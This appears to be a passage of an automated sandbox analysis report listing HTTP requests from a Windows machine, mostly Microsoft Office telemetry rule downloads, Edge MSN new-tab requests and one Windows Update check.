                      Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1730149368269&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=490a2f67b40a434ab4bd51de99d9857b&activityId=490a2f67b40a434ab4bd51de99d9857b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=8D11DA5D07D0476E8AD817EC2CDCBF7F&MUID=31232435889767F20B43311389B266D3 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=31232435889767F20B43311389B266D3; _EDGE_S=F=1&SID=1A3CA821F91261D81DCEBD07F86460D7; _EDGE_V=1; SM=T; msnup=; _C_ETH=1
                      Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pK7CKmhVNkRmn+H&MD=nTznes85 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                      Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
